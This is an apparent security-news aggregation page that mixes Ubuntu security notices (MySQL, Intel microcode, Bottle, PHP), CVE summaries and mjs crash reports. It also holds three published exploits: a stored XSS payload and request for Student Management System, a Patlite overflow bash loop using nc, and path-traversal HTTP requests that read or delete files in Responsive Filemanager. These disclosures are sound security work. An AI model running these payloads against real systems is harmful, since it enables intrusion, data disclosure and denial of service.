Ubuntu Security Notice 5537-1 - Multiple security issues were discovered in MySQL and this update includes new upstream MySQL versions to fix these issues. MySQL has been updated to 8.0.30 in Ubuntu 20.04 LTS and Ubuntu 22.04 LTS. Ubuntu 18.04 LTS has been updated to MySQL 5.7.39. In addition to security fixes, the updated packages contain bug fixes, new features, and possibly incompatible changes.

    ==========================================================================Ubuntu Security Notice USN-5537-1July 28, 2022mysql-5.7, mysql-8.0 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in MySQL.Software Description:- mysql-8.0: MySQL database- mysql-5.7: MySQL databaseDetails:Multiple security issues were discovered in MySQL and this update includesnew upstream MySQL versions to fix these issues.MySQL has been updated to 8.0.30 in Ubuntu 20.04 LTS and Ubuntu 22.04 LTS.Ubuntu 18.04 LTS has been updated to MySQL 5.7.39.In addition to security fixes, the updated packages contain bug fixes, newfeatures, and possibly incompatible changes.Please see the following for more information:https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-39.htmlhttps://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-30.htmlhttps://www.oracle.com/security-alerts/cpujul2022.htmlUpdate instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:  mysql-server-8.0                8.0.30-0ubuntu0.22.04.1Ubuntu 20.04 LTS:  mysql-server-8.0                8.0.30-0ubuntu0.20.04.2Ubuntu 18.04 LTS:  mysql-server-5.7                5.7.39-0ubuntu0.18.04.2This update uses a new upstream release, which includes additional bugfixes. In general, a standard system update will make all the necessarychanges.References:  https://ubuntu.com/security/notices/USN-5537-1  CVE-2022-21509, CVE-2022-21515, CVE-2022-21517, CVE-2022-21522,  CVE-2022-21525, CVE-2022-21526, CVE-2022-21527, CVE-2022-21528,  CVE-2022-21529, CVE-2022-21530, CVE-2022-21531, CVE-2022-21534,  CVE-2022-21537, CVE-2022-21538, CVE-2022-21539, CVE-2022-21547,  CVE-2022-21553, CVE-2022-21569Package Information:  https://launchpad.net/ubuntu/+source/mysql-8.0/8.0.30-0ubuntu0.22.04.1  https://launchpad.net/ubuntu/+source/mysql-8.0/8.0.30-0ubuntu0.20.04.2  https://launchpad.net/ubuntu/+source/mysql-5.7/5.7.39-0ubuntu0.18.04.2

Ubuntu Security Notice USN-5537-1

In zulip before 1.3.12, bot API keys were accessible to other users in the same realm.

CVE-2016-4426: Version History — Zulip 2.1.7 documentation

Ubuntu Security Notice 5535-1 - Joseph Nuzman discovered that some Intel processors did not properly initialise shared resources. A local attacker could use this to obtain sensitive information. Mark Ermolov, Dmitry Sklyarov and Maxim Goryachy discovered that some Intel processors did not prevent test and debug logic from being activated at runtime. A local attacker could use this to escalate privileges.

==========================================================================  
Ubuntu Security Notice USN-5535-1  
July 28, 2022

Intel Microcode vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.04 ESM

Summary:

Several security issues were fixed in Intel Microcode.

Software Description:  
- intel-microcode: Processor microcode for Intel CPUs

Details:

Joseph Nuzman discovered that some Intel processors did not properly  
initialise shared resources. A local attacker could use this to obtain  
sensitive information. (CVE-2021-0145)

Mark Ermolov, Dmitry Sklyarov and Maxim Goryachy discovered that some Intel  
processors did not prevent test and debug logic from being activated at  
runtime. A local attacker could use this to escalate  
privileges. (CVE-2021-0146)

It was discovered that some Intel processors did not implement sufficient  
control flow management. A local attacker could use this to cause a denial  
of service (system crash). (CVE-2021-0127)

It was discovered that some Intel processors did not completely perform  
cleanup actions on multi-core shared buffers. A local attacker could  
possibly use this to expose sensitive information. (CVE-2022-21123,  
CVE-2022-21127)

It was discovered that some Intel processors did not completely perform  
cleanup actions on microarchitectural fill buffers. A local attacker could  
possibly use this to expose sensitive information. (CVE-2022-21125)

Alysa Milburn, Jason Brandt, Avishai Redelman and Nir Lavi discovered that  
some Intel processors improperly optimised security-critical code. A local  
attacker could possibly use this to expose sensitive  
information. (CVE-2022-21151)

It was discovered that some Intel processors did not properly perform  
cleanup during specific special register write operations. A local attacker  
could possibly use this to expose sensitive information. (CVE-2022-21166)

It was discovered that some Intel processors did not properly restrict  
access in some situations. A local attacker could use this to obtain  
sensitive information. (CVE-2021-33117)

Brandon Miller discovered that some Intel processors did not properly  
restrict access in some situations. A local attacker could use this to  
obtain sensitive information or a remote attacker could use this to  
cause a denial of service (system crash). (CVE-2021-33120)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 16.04 ESM:  
intel-microcode 3.20220510.0ubuntu0.16.04.1+esm1

In general, a standard system update will make all the necessary changes.

References:  
https://ubuntu.com/security/notices/USN-5535-1  
CVE-2021-0127, CVE-2021-0145, CVE-2021-0146, CVE-2021-33117,  
CVE-2021-33120, CVE-2022-21123, CVE-2022-21125, CVE-2022-21127,  
CVE-2022-21151, CVE-2022-21166

Ubuntu Security Notice USN-5535-1

A stored cross-site scripting (XSS) vulnerability in /nav_bar_action.php of Student Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Chat box.

    # Exploit Title: Student Management System 1.0 - 'message' Persistent Cross-Site Scripting (Authenticated)
    # Date: 2021-05-13
    # Exploit Author: mohsen khashei (kh4sh3i) or kh4sh3i@gmail.com
    # Vendor Homepage: https://github.com/amirhamza05/Student-Management-System
    # Software Link: https://github.com/amirhamza05/Student-Management-System/archive/refs/heads/master.zip
    # Version: 1.0
    # Tested on: ubuntu 20.04.2
    
    # --- Description --- #
    
    # The web application allows for an  Attacker to inject persistent Cross-Site-Scripting payload in Live Chat. 
    
    
    # --- Proof of concept --- #
    
    1- Login to Student Management System
    2- Click on Live Chat button
    3- Inject this payload and send : <image src=1 onerror="javascript:alert(document.domain)"></image>
    5- Xss popup will be triggered.
    
    
    # --- Malicious Request --- #
    
    POST /nav_bar_action.php HTTP/1.1
    Host: (HOST)
    Cookie: (PHPSESSID)
    Content-Length: 96
    
    send_message_chat%5Bmessage%5D=<image src=1 onerror="javascript:alert(document.domain)"></image>

CVE-2021-33371: Offensive Security’s Exploit Database Archive

Ubuntu Security Notice 5532-1 - It was discovered that Bottle incorrectly handled errors during early request binding. An attacker could possibly use this issue to disclose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-5532-1  
July 26, 2022

python-bottle vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Bottle could be made to leak sensitive information if it received a specially  
crafted request.

Software Description:  
- python-bottle: fast and simple WSGI-framework for Python

Details:

It was discovered that Bottle incorrectly handled errors during early request   
binding. An attacker could possibly use this issue to disclose sensitve   
information. (CVE-2022-31799)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
  python3-bottle                  0.12.19-1+deb11u1build0.22.04.1

Ubuntu 20.04 LTS:  
  python3-bottle                  0.12.15-2.1ubuntu0.2

Ubuntu 18.04 LTS:  
  python-bottle                   0.12.13-1ubuntu0.2  
  python3-bottle                  0.12.13-1ubuntu0.2

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5532-1  
  CVE-2022-31799

Package Information:  
  https://launchpad.net/ubuntu/+source/python-bottle/0.12.19-1+deb11u1build0.22.04.1  
  https://launchpad.net/ubuntu/+source/python-bottle/0.12.15-2.1ubuntu0.2  
  https://launchpad.net/ubuntu/+source/python-bottle/0.12.13-1ubuntu0.2

Ubuntu Security Notice USN-5532-1

An issue was discovered in mjs(mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is stack buffer overflow at 0x7fffe9049390.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

Clingto opened this issue

May 19, 2021

· 0 comments

**Comments**

System info:  
Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, mjs (latest master 4c870e5)  
Compile Command:

    $ gcc -fsanitize=address -fno-omit-frame-pointer -DMJS_MAIN mjs.c -ldl -g -o mjs
    

Run Command:

POC file:  
https://github.com/Clingto/POC/blob/master/MSA/mjs/mjs-module-stack-overflow

ASAN info:

ASAN:SIGSEGV
=================================================================
==10560\==ERROR: AddressSanitizer: stack-overflow on address 0x7fffe9049390 (pc 0x7fffe9049390 bp 0x00000042572b sp 0x7fffe9049348 T0)
    #0 0x7fffe904938f  (<unknown module>)

SUMMARY: AddressSanitizer: stack-overflow ??:0 ??
==10560\==ABORTING

1 participant

CVE-2021-33448: AddressSanitizer: stack-buffer-overflow in <unknown module> · Issue #170 · cesanta/mjs

An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There are memory leaks in frozen_cb() in mjs.c.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

Clingto opened this issue

May 19, 2021

· 0 comments

**Comments**

System info:  
Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, mjs (latest master 4c870e5)  
Compile Command:

    $ gcc -fsanitize=address -fno-omit-frame-pointer -DMJS_MAIN mjs.c -ldl -g -o mjs
    

Run Command:

POC file:  
https://github.com/Clingto/POC/blob/master/MSA/mjs/mjs-5794-frozen\_cb-memory-leak

ASAN info:

\==29407\==ERROR: LeakSanitizer: detected memory leaks

Direct leak of 37331 byte(s) in 1 object(s) allocated from:
    #0 0x7f151fe52602 in malloc (/usr/lib/x86\_64-linux-gnu/libasan.so.2+0x98602)
    #1 0x42ffcd in frozen\_cb  test/mjs-uaf/build\_asan/mjs.c:12025
    #2 0x4092c4 in json\_parse\_string  test/mjs-uaf/build\_asan/mjs.c:5898
    #3 0x40b482 in json\_parse\_value  test/mjs-uaf/build\_asan/mjs.c:5993
    #4 0x40aa25 in json\_parse\_array  test/mjs-uaf/build\_asan/mjs.c:5958
    #5 0x40b4c4 in json\_parse\_value  test/mjs-uaf/build\_asan/mjs.c:6000
    #6 0x40b863 in json\_parse\_pair  test/mjs-uaf/build\_asan/mjs.c:6058
    #7 0x40bc63 in json\_parse\_object  test/mjs-uaf/build\_asan/mjs.c:6070
    #8 0x40b4a3 in json\_parse\_value  test/mjs-uaf/build\_asan/mjs.c:5996
    #9 0x40c135 in json\_doit  test/mjs-uaf/build\_asan/mjs.c:6083
    #10 0x40f2aa in json\_walk  test/mjs-uaf/build\_asan/mjs.c:6466
    #11 0x4309d9 in mjs\_json\_parse  test/mjs-uaf/build\_asan/mjs.c:12133
    #12 0x430f11 in mjs\_op\_json\_parse  test/mjs-uaf/build\_asan/mjs.c:12193
    #13 0x42572a in mjs\_execute  test/mjs-uaf/build\_asan/mjs.c:9648
    #14 0x4265f1 in mjs\_exec\_internal  test/mjs-uaf/build\_asan/mjs.c:9866
    #15 0x426873 in mjs\_exec\_file  test/mjs-uaf/build\_asan/mjs.c:9889
    #16 0x431348 in main  test/mjs-uaf/build\_asan/mjs.c:12228
    #17 0x7f151f80c82f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2082f)

SUMMARY: AddressSanitizer: 37331 byte(s) leaked in 1 allocation(s).

1 participant

CVE-2021-33437: AddressSanitizer: 1 memory leaks of frozen_cb() · Issue #160 · cesanta/mjs

Ubuntu Security Notice 5530-1 - It was discovered that PHP incorrectly handled certain memory operations when obtaining file information. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-5530-1July 25, 2022php8.1 vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:PHP could be made to crash or run programs if it processed speciallycrafted data.Software Description:- php8.1: HTML-embedded scripting language interpreterDetails:It was discovered that PHP incorrectly handled certain memory operationswhen obtaining file information. A remote attacker could use this issue tocause PHP to crash, resulting in a denial of service, or possibly executearbitrary code.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:  libapache2-mod-php8.1           8.1.2-1ubuntu2.2  php8.1-cgi                      8.1.2-1ubuntu2.2  php8.1-cli                      8.1.2-1ubuntu2.2  php8.1-fpm                      8.1.2-1ubuntu2.2  php8.1-mysql                    8.1.2-1ubuntu2.2  php8.1-pgsql                    8.1.2-1ubuntu2.2In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-5530-1  CVE-2022-31627Package Information:  https://launchpad.net/ubuntu/+source/php8.1/8.1.2-1ubuntu2.2

Ubuntu Security Notice USN-5530-1

Patlite versions 1.45 and below suffer from a buffer overflow vulnerability.

    # Exploit Title: CVE-2022-35911 - Patlite Overflow.# Date: 2022-07-07# Exploit Author: Samy Younsi - Necrum Security Labs# Vendor Homepage: https://www.patlite.co.jp# Software Link: https://www.patlite.co.jp/product/detail0000021462.html# Version: Versions 1.46 and bellow are affected# Tested on: CentOs & Ubuntu# CVE : CVE-2022-35911#!/bin/bashIP="192.168.1.101"PORT="80"for i in {0..1000}; do   echo "[$i]: ";   echo -ne "GET /api/control/AAAAAAAAAAAAAAAAAA HTTP/1.1\r\nHost: $IP\r\n\r\n" | nc $IP $PORT; done > /dev/null 2>&1

Patlite 1.46 Buffer Overflow

A vulnerability was found in Tecrail Responsive Filemanger up to 9.10.x and classified as critical. The manipulation leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 9.11.0 is able to address this issue. It is recommended to upgrade the affected component.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives****Responsive Filemanger <= 9.11.0 - Arbitrary File Disclosure/Deletion**

_From_: Wiswat A <wiswat.a () gmail com>  
_Date_: Wed, 8 Feb 2017 00:28:23 +0700  

\[+\] Exploit Title: Responsive Filemanger <= 9.11.0 - Arbitrary File
Disclosure/Deletion
\[+\] Date: 7 Feb 2017
\[+\] Vulnerability and Exploit Author: Wiswat Aswamenakul
\[+\] Vendor Homepage: http://www.responsivefilemanager.com/
\[+\] Affected version: only tested on 9.11.0 and 9.7.3 (other versions
might be affected)
\[+\] Tested on: Ubuntu 14.04, PHP 5.5.9
\[+\] Category: webapps

\[+\] Description
Responsive filemanger is a PHP based file manager that make use of AJAX
technology. It has various useful features. One of them is copy/cut and
paste files. However, the copy/cut feature does not santize file name
that will be copied/cut. Therefore, it is possible for attackers to
copied/cut any files including PHP files and paste them to overwrite
existing image files. Then, the attackers could download the overwritten
image files to read the content of the copied/cut files. Moreover, for
the cut feature, it can cause the original files to be deleted as well.

\[+\] Exploit
1. Upload a normal image file (jpg, png, gif) to a server
2. Right click at any files, select copy and capture the request with
Burp Suite (or any local proxy)
3. Change parameter "path" to any file name that we would like to
download, for example, path=../filemanager/config/config.php

###
POST /fm/filemanager/ajax\_calls.php?action=copy\_cut HTTP/1.1
Host: 192.168.1.128
Content-Length: 53
Accept: \*/\*
Origin: http://192.168.1.128
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86\_64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer:
http://192.168.1.128/fm/filemanager/dialog.php?editor=0&type=0&lang=en\_EN&popup=0&crossdomain=0&field\_id=&relative\_url=0&akey=key&fldr=%2F&5869110e2a073
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: last\_position=%2F; PHPSESSID=lenmc074o86fe2sq7i1dtnh8j0
Connection: close

path=../filemanager/config/config.php&sub\_action=copy
###

4. Go to any sub directory, right click at any files, intercept the
request with burp, select "Paste to this directory"
5. Change parameter "path" to the image file uploaded in step 1, for
example, path=subdir/size.png

###
POST /fm/filemanager/execute.php?action=paste\_clipboard HTTP/1.1
Host: 192.168.1.128
Content-Length: 20
Accept: \*/\*
Origin: http://192.168.1.128
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86\_64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer:
http://192.168.1.128/fm/filemanager/dialog.php?editor=0&type=0&lang=en\_EN&popup=0&crossdomain=0&field\_id=&relative\_url=0&akey=key&fldr=subdir%2F&5869110f9a268
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: last\_position=subdir%2F; PHPSESSID=lenmc074o86fe2sq7i1dtnh8j0
Connection: close

path=subdir/size.png
###

6. Download the image file uploaded in step 1, it will contain content
of the file specified in step 3

\[+\] Note (about another issue I found)
During this report, I found another separated issue with the attack
filtering that only check for "../" but not "..\\" which can be used to
bypass all filters if the application runs on Windows server and reported
the issue to the owner as well. However, I found out that this issue was
found by a guy from hacktizen and detailed in following blog post
http://hacktizen.blogspot.com/2016/06/responsive-filemanager-9102-directory.html
So, the credit goes for the guy who firstly reported. Perhaps, the guy from
hackitizen did not contact the owner of responsive filemanger or there are
any problems with communication. Therefore, the issue remains unresolved.

\[+\] Timeline
- 02/01/2017: Contact Owner
- 05/02/2017: Patched version is available
- 07/02/2017: Public Advisory

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **Responsive Filemanger <= 9.11.0 - Arbitrary File Disclosure/Deletion** _Wiswat A (Feb 07)_

Tag

#ubuntu